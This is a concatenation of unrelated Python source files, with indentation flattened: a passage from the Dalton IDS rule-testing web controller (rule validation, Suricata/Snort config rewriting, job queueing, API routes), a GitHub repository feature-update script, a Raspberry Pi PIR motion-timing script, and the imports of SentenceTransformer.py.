custom_rules = request.form.get('custom_ruleset')
# strip out leading newlines and CRLFCRLF in case the sensor does not like it for some reason
custom_rules = custom_rules.lstrip('\x0A\x0D')
while re.search(r'\x0D\x0A\x0D\x0A', custom_rules):
custom_rules = custom_rules.replace('\x0D\x0A\x0D\x0A', '\x0D\x0A')
# used for automatically generating SID values for ad-hoc rules that don't include them
sid_base = 806421600
sid_offset = 1
# file we will write the custom rules to
fh = open(custom_rules_file, 'wb')
# check for rule errors (very simple right now)
for line in custom_rules.split('\n'):
# strip out trailing whitespace (note: this removes the newline chars too so have to add them back when we write to file)
line = line.rstrip()
# strip out leading whitespace to make subsequent matching easier (snort won't complain about leading whitespace though)
line = line.lstrip()
# if empty or comment line, continue
if line == '' or re.search(r'^\s+$', line) or line.startswith('#'):
continue
if (len(line) > 0) and not re.search(r'^[\x00-\x7F]+$', line):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule. Only ASCII characters are allowed in the literal representation of custom rules.", "Please encode necesary non-ASCII characters appropriately. Rule:", " %s" % line])
# some rule validation for Snort and Suricata
if sensor_tech.startswith('snort') or sensor_tech.startswith('suri'):
# rule must start with alert|log|pass|activate|dynamic|drop|reject|sdrop
if not re.search(r'^(alert|log|pass|activate|dynamic|drop|reject|sdrop|event_filter|threshold|suppress|rate_filter|detection_filter)\s', line):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule, action (first word in rule) of \'%s\' not supported. Rule:" % line.split()[0], "%s" % line])
# rule must end in closing parenthesis
if not line.endswith(')') and not line.startswith("event_filter") and not line.startswith("threshold") \
and not line.startswith("suppress") and not line.startswith("rate_filter") and not line.startswith("detection_filter"):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule; does not end with closing parenthesis. Rule:", "%s" % line])
# last keyword in the rule must be terminated by a semicolon
if not line[:-1].rstrip().endswith(';') and not line.startswith("event_filter") and not line.startswith("threshold") \
and not line.startswith("suppress") and not line.startswith("rate_filter") and not line.startswith("detection_filter"):
fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid rule, last rule option must end with semicolon. Rule:", "%s" % line])
# add sid if not included
if not re.search(r'(\s|\x3B)sid\s*\:\s*\d+\s*\x3B', line) and not line.startswith("event_filter") and not line.startswith("threshold") \
and not line.startswith("suppress") and not line.startswith("rate_filter") and not line.startswith("detection_filter"):
# if no sid in rule, fix automatically instead of throwing an error
#return render_template('/dalton/error.html', jid='', msg=["\'sid\' not specified in rule, this will error. Rule:", "%s" % line])
line = re.sub(r'\x29$', " sid:%d;)" % (sid_base + sid_offset), line)
sid_offset += 1
# including newline because it was removed earlier with rstrip()
fh.write("%s\n" % line)
fh.close()
if not sensor_tech:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid="<not_defined>", msg=["Variable \'sensor_tech\' not specified. Please reload the submission page and try again."])
# get 'Override External_NET - set to any' option
bOverrideExternalNet = False
try:
if request.form.get('overrideExternalNet'):
bOverrideExternalNet = True
except:
pass
# get and write variables
vars = request.form.get('custom_vars')
if not vars:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["No variables defined."])
# pre-set IP vars to add to the config if they don't exist.
# this helps with some rulesets that may use these variables
# but the variables aren't in the default config.
ipv2add = {'RFC1918': "[10.0.0.0/8,192.168.0.0/16,172.16.0.0/12]"
}
conf_file = request.form.get('custom_engineconf')
if not conf_file:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["No configuration file provided."])
if sensor_tech.startswith('suri'):
#yaml-punch!
# combine engine conf and variables
# set to NULL so no attempt to include it will happen later
vars_file = None
# just in case someone edited and didn't quote a boolean
conf_file = re.sub(r'(\w):\x20+(yes|no)([\x20\x0D\x0A\x23])', '\g<1>: "\g<2>"\g<3>', conf_file)
try:
# read in yaml
config = yaml.round_trip_load(conf_file, version=(1,1), preserve_quotes=True)
# add in vars
vars_config = yaml.safe_load(vars, version=(1,1))
# add some IP vars common to some rulesets
try:
for v in ipv2add:
if v not in vars_config['vars']['address-groups']:
vars_config['vars']['address-groups'][v] = ipv2add[v]
except Exception as e:
logger.warn("(Not Fatal) Problem customizing Suricata variables; your YAML may be bad. %s" % e)
logger.debug("%s" % traceback.format_exc())
# set EXTERNAL_NET to 'any' if option set
try:
if bOverrideExternalNet:
if not 'EXTERNAL_NET' in vars_config['vars']['address-groups']:
logger.warn("EXTERNAL_NET IP variable not set in config; setting to 'any'")
vars_config['vars']['address-groups']['EXTERNAL_NET'] = 'any'
logger.debug("Set 'EXTERNAL_NET' IP variable to 'any'")
except Exception as e:
logger.warn("(Not Fatal) Problem ovverriding EXTERNAL_NET: %s" % e)
logger.debug("%s" % traceback.format_exc())
config.update(vars_config)
# first, do rule includes
# should references to other rule files be removed?
removeOtherRuleFiles = True
if not 'rule-files' in config or removeOtherRuleFiles:
config['rule-files'] = []
if request.form.get('optionProdRuleset'):
# some code re-use here
prod_ruleset_name = os.path.basename(request.form.get('prod_ruleset'))
if not prod_ruleset_name.endswith(".rules"):
prod_ruleset_name = "%s.rules" % prod_ruleset_name
config['rule-files'].append("%s" % prod_ruleset_name)
if bCustomRules:
config['rule-files'].append("dalton-custom.rules")
# remove default rule path; added back on agent
if 'default-rule-path' in config:
config.pop('default-rule-path', None)
# set outputs
if 'outputs' not in config:
logger.warn("No 'outputs' seciton in Suricata YAML. This may be a problem....")
# going to try to build this from scratch but Suri still may not like it
config['outputs'] = []
# apparently with this version of ruamel.yaml and the round-trip load, 'outputs' isn't
# an ordered dict but a list...
olist = [config['outputs'][i].keys()[0] for i in range(0, len(config['outputs']))]
# fast.log
fast_config = {'fast': {'enabled': True, \
'filename': "dalton-fast.log", \
'append': True}}
if 'fast' in olist:
config['outputs'][olist.index('fast')] = fast_config
else:
config['outputs'].append(fast_config)
# unified2 logging
deployment = "reverse"
header = "X-Forwarded-For"
if 'unified2-alert' in olist:
try:
deployment = config['outputs'][olist.index('unified2-alert')]['unified2-alert']['xff']['deployment']
except Exception as e:
logger.debug("Could not get outputs->unified2-alert->xff->deployment. Using default value of '%s'" % deployment)
try:
header = config['outputs'][olist.index('unified2-alert')]['unified2-alert']['xff']['header']
except Exception as e:
logger.debug("Could not get outputs->unified2-alert->xff->header. Using default value of '%s'" % header)
u2_config = {'unified2-alert': {'enabled': True, \
'filename': "unified2.dalton.alert", \
'xff': {'enabled': True, 'mode': 'extra-data', \
'deployment': deployment, 'header': header}}}
if 'unified2-alert' in olist:
config['outputs'][olist.index('unified2-alert')] = u2_config
else:
config['outputs'].append(u2_config)
#stats
stats_config = {'stats': {'enabled': True, \
'filename': "dalton-stats.log", \
'totals': True, \
'threads': False}}
if 'stats' in olist:
config['outputs'][olist.index('stats')] = stats_config
else:
config['outputs'].append(stats_config)
if not "profiling" in config:
config['profiling'] = {}
# always return Engine stats for Suri
config['profiling']['packets'] = {'enabled': True, \
'filename': "dalton-packet_stats.log", \
'append': True}
if bGetOtherLogs:
# alert-debug
alert_debug_config = {'alert-debug': {'enabled': True, \
'filename': "dalton-alert_debug.log", \
'append': True}}
if 'alert-debug' in olist:
config['outputs'][olist.index('alert-debug')] = alert_debug_config
else:
config['outputs'].append(alert_debug_config)
# http
http_config = {'http-log': {'enabled': True, \
'filename': "dalton-http.log", \
'append': True}}
if 'http-log' in olist:
config['outputs'][olist.index('http-log')] = http_config
else:
config['outputs'].append(http_config)
# tls
tls_config = {'tls-log': {'enabled': True, \
'filename': "dalton-tls.log", \
'append': True}}
if 'tls-log' in olist:
config['outputs'][olist.index('tls-log')] = tls_config
else:
config['outputs'].append(tls_config)
# dns
dns_config = {'dns-log': {'enabled': True, \
'filename': "dalton-dns.log", \
'append': True}}
if 'dns-log' in olist:
config['outputs'][olist.index('dns-log')] = dns_config
else:
config['outputs'].append(dns_config)
# Don't try to enable eve-log since it is unformatted and redundant in many cases.
# But in case it is enabled, set the filename and disable EVE tls since you
# can't have tls log to file AND be included in the EVE log.
try:
# set filename
config['outputs'][olist.index('eve-log')]['eve-log']['filename'] = "dalton-eve.json"
# disable EVE TLS logging. This mixing of dicts and lists is onerous....
# Update: apparently in Suri 4 and >= 3.1 you CAN have multiple tls loggers....
# doing this one at a time (two passes) since we are iterating over the structure
# we want to edit AND we are using list indexes.
# Also, the yaml will be represented differently based on the values (e.g. string vs ordered dict).
# Instead of trying to check everything every time, just catch the exception(s) and move on. The
# stuff we want disabled will still get disabled despite the exceptions along the way.
for i in range(0,len(config['outputs'][olist.index('eve-log')]['eve-log']['types'])):
try:
if config['outputs'][olist.index('eve-log')]['eve-log']['types'][i].keys()[0] == 'alert':
# apparently this is supported -- http://suricata.readthedocs.io/en/latest/output/eve/eve-json-output.html
config['outputs'][olist.index('eve-log')]['eve-log']['types'][i]['alert'].pop('tls', None)
logger.debug("Removed outputs->eve-log->types->alert->tls")
break
except Exception as e:
#logger.debug("Possible issue when removing outputs->eve-log->types->alert->tls (EVE TLS log). Error: %s" % e)
pass
for i in range(0,len(config['outputs'][olist.index('eve-log')]['eve-log']['types'])):
try:
if config['outputs'][olist.index('eve-log')]['eve-log']['types'][i].keys()[0] == 'tls':
del config['outputs'][olist.index('eve-log')]['eve-log']['types'][i]
logger.debug("Removed outputs->eve-log->types->tls")
break
except Exception as e:
#logger.debug("Possible issue when removing outputs->eve-log->types->tls (EVE TLS log). Error: %s" % e)
pass
except Exception as e:
logger.debug("Problem editing eve-log section of config: %s" % e)
pass
# set filename for rule and keyword profiling
if bTrackPerformance:
# rule profiling
if not "rules" in config['profiling']:
config['profiling']['rules'] = {'enabled': True, \
'filename': "dalton-rule_perf.log", \
'append': True, \
'sort': "avgticks", \
'limit': 1000, \
'json': False}
else:
config['profiling']['rules']['enabled'] = True
config['profiling']['rules']['filename'] = "dalton-rule_perf.log"
config['profiling']['rules']['json'] = False
# keyword profiling
# is this supported by older Suri versions? If not Suri will ignore when loading YAML
if 'keywords' in config['profiling']:
config['profiling']['keywords'] = {'enabled': True, \
'filename': "dalton-keyword_perf.log", \
'append': True}
# write out
engine_conf_file = os.path.join(TEMP_STORAGE_PATH, "%s_suricata.yaml" % job_id)
engine_conf_fh = open(engine_conf_file, "wb")
engine_conf_fh.write(yaml.round_trip_dump(config, version=(1,1), explicit_start=True))
engine_conf_fh.close()
except Exception as e:
logger.error("Problem processing YAML file(s): %s" % e)
logger.debug("%s" % traceback.format_exc())
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Error processing YAML file(s):", "%s" % e])
else:
engine_conf_file = None
vars_file = os.path.join(TEMP_STORAGE_PATH, "%s_variables.conf" % job_id)
vars_fh = open(vars_file, "wb")
if sensor_tech.startswith('snort'):
# check variables
for line in vars.split('\n'):
# strip out leading and trailing whitespace (note: this removes the newline chars too so have to add them back when we write to file)
line = line.strip()
# if empty or comment line, continue
if line == '' or line.startswith('#'):
continue
if not re.search(r'^(var|portvar|ipvar)\s', line):
vars_fh.close()
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid='', msg=["Invalid variable definition. Must be 'var', 'portvar', or 'ipvar':", "%s" % line])
if bOverrideExternalNet:
if line.startswith("ipvar EXTERNAL_NET "):
line = "ipvar EXTERNAL_NET any"
logger.debug("Set 'EXTERNAL_NET' ipvar to 'any'")
if line.startswith("var EXTERNAL_NET "):
line = "var EXTERNAL_NET any"
logger.debug("Set 'EXTERNAL_NET' var to 'any'")
vars_fh.write("%s\n" % line)
# add 'ipvar EXTERNAL_NET any' if not present and Override EXTERNAL_NET option set
if bOverrideExternalNet and not "\nipvar EXTERNAL_NET " in vars and not vars.startswith("ipvar EXTERNAL_NET ") and not "\nvar EXTERNAL_NET " in vars and not vars.startswith("var EXTERNAL_NET "):
logger.warn("No EXTERNAL_NET variable found in Snort config, adding 'ipvar EXTERNAL_NET any'")
vars_fh.write("ipvar EXTERNAL_NET any\n")
# add some IP vars common to some rulesets
try:
for v in ipv2add:
if not "\nipvar %s " % v in vars and not vars.startswith("ipvar %s " % v):
vars_fh.write("ipvar %s %s\n" % (v, ipv2add[v]))
except Exception as e:
logger.warn("(Not Fatal) Problem customizing Snort variables: %s" % e)
logger.debug("%s" % traceback.format_exc())
# tweak Snort conf file
if bTrackPerformance:
new_conf = ''
perf_found = False
# splitlines without 'True' arg removes ending newline char(s)
lines = iter(conf_file.splitlines())
while True:
try:
line = next(lines)
# might as well strip out comments
if line.lstrip(' ').startswith('#') or line.lstrip(' ').rstrip(' ') == '': continue
if line.startswith("config profile_rules:"):
perf_found = True
while line.endswith("\\"):
line = line.rstrip('\\') + next(lines)
if "filename " in line:
line = re.sub(r'filename\s+[^\s\x2C]+', 'filename dalton-rule_perf.log', line)
else:
line += ", filename dalton-rule_perf.log append"
new_conf += "%s\n" % line
except StopIteration:
break
if not perf_found:
new_conf += "\nconfig profile_rules: print 1000, sort avg_ticks, filename dalton-rule_perf.log append"
conf_file = new_conf
engine_conf_file = os.path.join(TEMP_STORAGE_PATH, "%s_snort.conf" % job_id)
else:
vars_fh.write(vars)
engine_conf_file = os.path.join(TEMP_STORAGE_PATH, "%s_engine.conf" % job_id)
vars_fh.close()
engine_conf_fh = open(engine_conf_file, "wb")
engine_conf_fh.write(conf_file)
engine_conf_fh.close()
# create jid (job identifier) value
digest = hashlib.md5()
digest.update(job_id)
digest.update(sensor_tech)
jid = digest.hexdigest()[0:16]
#Create the job zipfile. This will contain the file 'manifest.json', which is also queued.
#And place the rules file, variables file, and test PCAPs within the zip file
if not os.path.exists(JOB_STORAGE_PATH):
os.makedirs(JOB_STORAGE_PATH)
zf_path = None
if bteapotJob:
# add 'teapot_' to the beginning of the jid to distinguish teapot jobs. Among other things, this
# makes it so cron or whatever can easily delete teapot jobs on a different schedule if need be.
jid = 'teapot_%s' % jid
zf_path = '%s/%s.zip' % (JOB_STORAGE_PATH, jid)
zf = zipfile.ZipFile(zf_path, mode='w')
try:
for pcap in pcap_files:
zf.write(pcap['pcappath'], arcname=os.path.basename(pcap['filename']))
if request.form.get('optionProdRuleset'):
ruleset_path = request.form.get('prod_ruleset')
if not ruleset_path:
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=jid, msg=["No defined ruleset provided."])
if not prod_ruleset_name: # if Suri job, this is already set above
prod_ruleset_name = os.path.basename(ruleset_path)
if not prod_ruleset_name.endswith(".rules"):
prod_ruleset_name = "%s.rules" % prod_ruleset_name
logger.debug("ruleset_path = %s" % ruleset_path)
logger.debug("Dalton in page_coverage_summary(): prod_ruleset_name: %s" % (prod_ruleset_name))
if not ruleset_path.startswith(RULESET_STORAGE_PATH) or ".." in ruleset_path or not re.search(r'^[a-z0-9\/\_\-\.]+$', ruleset_path, re.IGNORECASE):
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=jid, msg=["Invalid ruleset submitted: '%s'." % prod_ruleset_name, "Path/name invalid."])
elif not os.path.exists(ruleset_path):
delete_temp_files(job_id)
return render_template('/dalton/error.html', jid=jid, msg=["Ruleset does not exist on Dalton Controller: %s; ruleset-path: %s" % (prod_ruleset_name, ruleset_path)])
else:
# if these options are set, modify ruleset accordingly
if bEnableAllRules or bShowFlowbitAlerts:
modified_rules_path = "%s/%s_prod_modified.rules" % (TEMP_STORAGE_PATH, job_id)
regex = re.compile(r"^#+\s*(alert|log|pass|activate|dynamic|drop|reject|sdrop)\s")
prod_rules_fh = open(ruleset_path, 'rb')
modified_rules_fh = open(modified_rules_path, 'wb')
for line in prod_rules_fh:
# if Enable disabled rules checked, do the needful
if bEnableAllRules:
if regex.search(line):
line = line.lstrip('# \t')
# if show all flowbit alerts set, strip out 'flowbits:noalert;'
if bShowFlowbitAlerts:
line = re.sub(r'([\x3B\s])flowbits\s*\x3A\s*noalert\s*\x3B', '\g<1>', line)
modified_rules_fh.write(line)
prod_rules_fh.close()
modified_rules_fh.close()
ruleset_path = modified_rules_path
zf.write(ruleset_path, arcname=prod_ruleset_name)
try:
if request.form.get('optionCustomRuleset') and request.form.get('custom_ruleset'):
zf.write(custom_rules_file, arcname='dalton-custom.rules')
except Exception as e:
logger.warn("Problem adding custom rules: %s" % e)
pass
if vars_file:
zf.write(vars_file, arcname='variables.conf')
if engine_conf_file:
zf.write(engine_conf_file, arcname=os.path.basename(engine_conf_file))
#build the json job
json_job = {}
json_job['id'] = jid
json_job['pcaps']= []
for pcap in pcap_files:
json_job['pcaps'].append(os.path.basename(pcap['filename']))
json_job['user'] = user
json_job['enable-all-rules'] = bEnableAllRules
json_job['show-flowbit-alerts'] = bShowFlowbitAlerts
json_job['custom-rules'] = bCustomRules
json_job['track-performance'] = bTrackPerformance
json_job['get-engine-stats'] = bGetEngineStats
json_job['teapot-job'] = bteapotJob
json_job['alert-detailed'] = bGetAlertDetailed
json_job['get-fast-pattern'] = bGetFastPattern
json_job['get-other-logs'] = bGetOtherLogs
json_job['sensor-tech'] = sensor_tech
json_job['prod-ruleset'] = prod_ruleset_name
json_job['engine-conf'] = os.path.basename(engine_conf_file)
# add var and other fields too
str_job = json.dumps(json_job)
#build the manifest file
manifest_path = '%s/%s.json' % (TEMP_STORAGE_PATH, job_id)
f = open(manifest_path, 'w')
f.write(str_job)
f.close()
zf.write(manifest_path, arcname='manifest.json')
finally:
zf.close()
logger.debug("Dalton in page_coverage_summary(): created job zip file %s for user %s" % (zf_path, user))
#remove the temp files from local storage now that everything has been written to the zip file
delete_temp_files(job_id)
# Note: any redis sets here are not given expire times; these should
# be set when job is requested by agent
#store user name
r.set("%s-user" % jid, user)
#store sensor tech for job
r.set("%s-tech" % jid, sensor_tech)
# store submission time for job
r.set("%s-submission_time" % jid, datetime.datetime.now().strftime("%b %d %H:%M:%S"))
# if this is a teapot job, flag it in Redis
if bteapotJob:
r.set("%s-teapotjob" % jid, bteapotJob)
# set job as queued and write to the Redis queue
set_job_status(jid, STAT_CODE_QUEUED)
set_job_status_msg(jid, "Queued")
logger.info("Dalton user '%s' submitted Job %s to queue %s" % (user, jid, sensor_tech))
r.rpush(sensor_tech, str_job)
# add to list for queue web page
r.lpush("recent_jobs", jid)
if bteapotJob:
return jid
else:
return redirect('/dalton/job/%s' % jid)
@dalton_blueprint.route('/dalton/queue')
#@login_required()
def page_queue_default():
"""the default queue page"""
global r
num_jobs_to_show_default = 25
# clear old job files from disk
# spin off a thread in case deleting files from
# disk takes a while; this way we won't block the
# queue page from loading
Thread(target=delete_old_job_files).start()
try:
num_jobs_to_show = int(request.args['numjobs'])
except:
num_jobs_to_show = num_jobs_to_show_default
if not num_jobs_to_show or num_jobs_to_show < 0:
num_jobs_to_show = num_jobs_to_show_default
# use a list of dictionaries instead of a dict of dicts to preserve order when it gets passed to render_template
queue = []
queued_jobs = 0
running_jobs = 0
if r.exists('recent_jobs') and r.llen('recent_jobs') > 0:
# get the last num_jobs_to_show jobs; can adjust if you want (default set above in exception handler)
count = 0
jobs = r.lrange("recent_jobs", 0, -1)
for jid in jobs:
# iterate thru all jobs and get total number of queued and running but only return
# the most recent num_jobs_to_show jobs
# do some cleanup on the list to remove jobs where the data has expired (been deleted).
# Using 'jid-submission_time' and 'jid-status' as tests -- if these don't exist, the other keys associated
# with that jid should be expired or will expire shortly. That key gets set to expire
# after a job is requested/sent to a sensor so we won't clear out queued jobs.
if not r.exists("%s-submission_time" % jid) or not r.exists("%s-status" % jid):
# job has expired
logger.debug("Dalton in page_queue_default(): removing job: %s" % jid)
r.lrem("recent_jobs", jid)
# just in case, expire all keys associated with jid
expire_all_keys(jid)
else:
status = int(get_job_status(jid))
# ^^ have to cast as an int since it gets stored as a string (everything in redis is a string apparently....)
#logger.debug("Dalton in page_queue_default(): Job %s, stat code: %d" % (jid, status))
status_msg = "Unknown"
if status == STAT_CODE_QUEUED:
status_msg = "Queued"
queued_jobs += 1
elif status == STAT_CODE_RUNNING:
if check_for_timeout(jid):
status_msg = "Timeout"
else:
running_jobs += 1
status_msg = "Running"
if count < num_jobs_to_show:
if status == STAT_CODE_DONE:
status_msg = "Complete"
if r.get("%s-error" % jid):
status_msg += " (Error)"
else:
status_msg += " (Success)"
elif status == STAT_CODE_INTERRUPTED:
status_msg = "Interrupted"
elif status == STAT_CODE_TIMEOUT:
status_msg = "Timeout"
# Note: could add logic to not show teapot jobs?; add if teapotjob: job['teapot'] = "True" else: "False"
job = {}
job['jid'] = jid
job['tech'] = "%s" % r.get("%s-tech" % jid)
job['time'] = "%s" % r.get("%s-submission_time" % jid)
job['user'] = "%s" % r.get("%s-user" % jid)
job['status'] = status_msg
queue.append(job)
count += 1
return render_template('/dalton/queue.html', queue=queue, queued_jobs=queued_jobs, running_jobs=running_jobs, num_jobs=num_jobs_to_show)
@dalton_blueprint.route('/dalton/about')
#@login_required()
def page_about_default():
"""the about/help page"""
return render_template('/dalton/about.html', page='')
#########################################
# API handling code (some of it)
#########################################
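# Illustrative client usage for the API endpoints below (a sketch; the host name is a
# placeholder and depends on how the Dalton controller is deployed):
#
#   import requests
#   base = "http://dalton.example.com"   # placeholder
#   # fetch all stored data for a job
#   resp = requests.get(base + "/dalton/controller_api/v2/%s/all" % jid)
#   data = resp.json()                   # {'error': ..., 'error_msg': ..., 'data': ...}
#   # list active sensors for an engine
#   resp = requests.get(base + "/dalton/controller_api/get-current-sensors/suricata")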
@dalton_blueprint.route('/dalton/controller_api/v2/<jid>/<requested_data>', methods=['GET'])
#@auth_required()
def controller_api_get_request(jid, requested_data):
global r
# add to as necessary
valid_keys = ('alert', 'alert_detailed', 'ids', 'other_logs', 'perf', 'tech', 'error', 'time', 'statcode', 'debug', 'status', 'submission_time', 'start_time', 'user', 'all')
json_response = {'error':False, 'error_msg':None, 'data':None}
# some input validation
if not validate_jobid(jid):
json_response["error"] = True
json_response["error_msg"] = "Invalid Job ID value: %s" % jid
elif not re.match(r'^[a-zA-Z\d\_\.\-]+$', requested_data):
json_response["error"] = True
json_response["error_msg"] = "Invalid request for data: %s" % requested_data
else:
try:
status = get_job_status(jid)
except:
status = None
if not status:
# job doesn't exist
# expire (delete) all keys related to the job just in case to prevent memory leaks
expire_all_keys(jid)
json_response["error"] = True
json_response["error_msg"] = "Job ID %s does not exist" % jid
else:
# inspect the requested_data value and return the needful :)
# check 'valid_keys'
if requested_data not in valid_keys:
json_response["error"] = True
json_response["error_msg"] = "value '%s' invalid" % requested_data
else:
ret_data = None
if requested_data == 'all':
# 'all' returns a dict of all data (other values just return a string)
ret_data = {}
try:
for key in valid_keys:
if key == 'all':
continue
else:
ret_data[key] = r.get("%s-%s" % (jid, key))
except:
json_response["error"] = True
json_response["error_msg"] = "Unexpected error: cannot pull '%s' data for Job ID %s" % (requested_data, jid)
else:
try:
ret_data = r.get("%s-%s" % (jid, requested_data))
except:
json_response["error"] = True
json_response["error_msg"] = "Unexpected error: cannot pull '%s' for jobid %s," % (requested_data, jid)
json_response["data"] = "%s" % ret_data
return Response(json.dumps(json_response), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
#print "raw response: %s" % json_response
@dalton_blueprint.route('/dalton/controller_api/get-current-sensors/<engine>', methods=['GET'])
def controller_api_get_current_sensors(engine):
"""Returns a list of current active sensors"""
global r, supported_engines
sensors = []
if engine is None or engine == '' or engine not in supported_engines:
return Response("Invalid 'engine' supplied. Must be one of %s.\nExample URI:\n\n/dalton/controller_api/get-current-sensors/suricata" % supported_engines,
status=400, mimetype='text/plain', headers = {'X-Dalton-Webapp':'OK'})
# first, clean out old sensors
clear_old_agents()
# get active sensors based on engine
if r.exists('sensors'):
for sensor in r.smembers('sensors'):
t = r.get("%s-tech" % sensor)
if t.lower().startswith(engine.lower()):
sensors.append(t)
# sort so highest version number is first
try:
sensors.sort(key=LooseVersion, reverse=True)
except Exception as e:
sensors.sort(reverse=True)
# return json
json_response = {'sensor_tech': sensors}
return Response(json.dumps(json_response), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
@dalton_blueprint.route('/dalton/controller_api/get-current-sensors-json-full', methods=['GET'])
def controller_api_get_current_sensors_json_full():
"""Returns json with details about all the current active sensors"""
sensors = page_sensor_default(return_dict = True)
return Response(json.dumps(sensors), status=200, mimetype='application/json', headers = {'X-Dalton-Webapp':'OK'})
@dalton_blueprint.route('/dalton/controller_api/get-max-pcap-files', methods=['GET'])
def controller_api_get_max_pcap_files():
"""Returns the config value of max_pcap_files (the number of
pcap or compressed archive files that can be uploaded per job).
This could be useful for programmatic submissions where the
submitter can ensure all the files will be processed.
"""
return str(MAX_PCAP_FILES)
|
update_features.py
|
import Queue
import threading
from tqdm import tqdm
import pandas as pd
import requests
from app.utils import website_exists
def update_df(path="data/processed_data.csv"):
THREADS_COUNT = 5
data_frame = pd.DataFrame.from_csv(path)
bar = tqdm(total=len(data_frame))
df_q = Queue.LifoQueue()
df_q.put(data_frame)
token_q = Queue.LifoQueue()
for i in range(THREADS_COUNT):
token_q.put(i)
threads = []
for index, row in data_frame.iterrows():
t = threading.Thread(target=update_features, args=(index, row, bar, df_q, token_q))
t.daemon = True
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
df_q.get().to_csv(path)
def update_features(index, row, bar, df_q, token_q):
"""Define which features should be updated here. Preferably without using the Github API since we have no token renewal, yet."""
owner = row['owner']
name = row['name']
token = token_q.get()
try:
new_data_frame = pd.DataFrame.from_dict(row).T
is_owner_homepage = name.lower() == "{}.github.io".format(owner.lower()) or name.lower() == "{}.github.com".format(owner.lower())
has_homepage = website_exists("http://{}.github.io/{}".format(owner, name))
has_license = "octicon octicon-law" in requests.get("https://github.com/{}/{}".format(owner, name)).text
has_travis_config = website_exists("https://github.com/{}/{}/blob/master/.travis.yml".format(owner, name), only_headers=True)
has_circle_config = website_exists("https://github.com/{}/{}/blob/master/circle.yml".format(owner, name), only_headers=True)
has_ci_config = has_travis_config or has_circle_config
new_data_frame.set_value(index, "isOwnerHomepage", is_owner_homepage)
new_data_frame.set_value(index, "hasHomepage", has_homepage)
new_data_frame.set_value(index, "hasLicense", has_license)
new_data_frame.set_value(index, "hasTravisConfig", has_travis_config)
new_data_frame.set_value(index, "hasCircleConfig", has_circle_config)
new_data_frame.set_value(index, "hasCiConfig", has_ci_config)
except Exception, e:
print "Exception in aggregate_features: " + str(e)
token_q.put(token)
return
token_q.put(token)
shared_data_frame = df_q.get()
update_columns = ["isOwnerHomepage", "hasHomepage", "hasLicense", "hasTravisConfig", "hasCircleConfig", "hasCiConfig"]
for col in update_columns:
try:
shared_data_frame.set_value(index, col, new_data_frame.loc[index, col])
except Exception, e:
print "An error occured while fetching {}/{} and setting {}: {}".format(owner, name, col, e)
df_q.put(shared_data_frame)
bar.update()
if __name__ == '__main__':
update_df()
|
measure motion time with PIR.py
|
# Import standard python modules
import time
import datetime
import sys
import threading
# Import GPIO Module
import RPi.GPIO as GPIO
# Control of sincronization in Threads
lock = threading.RLock()
# Setup Sensor pin var
SENSOR_PIN = 5
# Setup var controls
showDataTime=5
# Define class for instance objects in threading
class MeasureData():
def __init__(self):
self.measureTime=0
self.isMovement=False
# Define functions for parallelism
def showData(motionMeasure):
counted=False
while True:
# show data every showDataTime seconds and reset the accumulated time
if(int(time.time())%showDataTime==0):
if(not counted):
lock.acquire()
print("{} | Tiempo de movimiento detectado {}".format(
datetime.datetime.now(), motionMeasure.measureTime))
motionMeasure.measureTime=0
lock.release()
counted=True
else:
counted=False
# Object instance holding the global data updated by the event handler
totalMotionTime=MeasureData()
# Set up a thread to show data every showDataTime seconds
hilo0=threading.Thread(target=showData, args=[totalMotionTime,])
hilo0.start()
# Define callback functions which will be called when certain events happen.
def motionPIR(channel):
# motionPIR is called when a RISING or FALLING GPIO event is detected.
# In retriggering mode (jumper placed in H), event detection works as follows:
# - RISING event (LOW to HIGH) while movement is being detected
# - FALLING event (HIGH to LOW) when movement has stopped
#   (after a few seconds, depending on the sensitivity setting)
timestamp = time.time()
stamp = datetime.datetime.fromtimestamp(timestamp).strftime('%H:%M:%S')
sense=GPIO.input(SENSOR_PIN)
if(sense==GPIO.HIGH):
# print('Movement detected: {}'.format(stamp))
totalMotionTime.isMovement=True
elif(sense==GPIO.LOW):
# print('No more movement: {}'.format(stamp))
totalMotionTime.isMovement=False
# Define Function "main", way to manage errors
def main():
# Setup GPIO mode
GPIO.setmode(GPIO.BCM)
# Set GPIO pin direction
GPIO.setup(SENSOR_PIN, GPIO.IN)
# add event for detection
GPIO.add_event_detect(SENSOR_PIN , GPIO.BOTH, callback=motionPIR,
bouncetime=150)
# measurement vars
motionTimeTemp=0
baseTime=0
measured=False # ensure baseTime is captured only once per motion event
while True:
if(totalMotionTime.isMovement):
if(not measured):
baseTime=time.time()
measured=True
else:
if(measured):
motionTimeTemp+=time.time()-baseTime
measured=False
if(int(time.time())%(showDataTime-1)==0):
if(totalMotionTime.isMovement):# case: motion is still ongoing
lock.acquire()
totalMotionTime.measureTime+=(motionTimeTemp+time.time()
-baseTime)
lock.release()
else:# case: there is no motion
lock.acquire()
totalMotionTime.measureTime+=motionTimeTemp
lock.release()
motionTimeTemp=0
time.sleep(0.5)
if __name__=="__main__":
try:
main()
except:
print("{} line {}".format(sys.exc_info()[0],
sys.exc_info()[-1].tb_lineno))
GPIO.cleanup()
|
SentenceTransformer.py
|
import json
import logging
import os
import shutil
from collections import OrderedDict
from typing import List, Dict, Tuple, Iterable, Type, Union, Callable
from zipfile import ZipFile
import requests
import numpy as np
from numpy import ndarray
import transformers
import torch
from torch import nn, Tensor, device
from torch.optim import Optimizer
from torch.utils.data import DataLoader
import torch.multiprocessing as mp
from tqdm.autonotebook import tqdm, trange
import math
import queue
from . import __DOWNLOAD_SERVER__
from .evaluation import SentenceEvaluator
from .util import import_from_string, batch_to_device, http_get
from .models import Transformer, Pooling
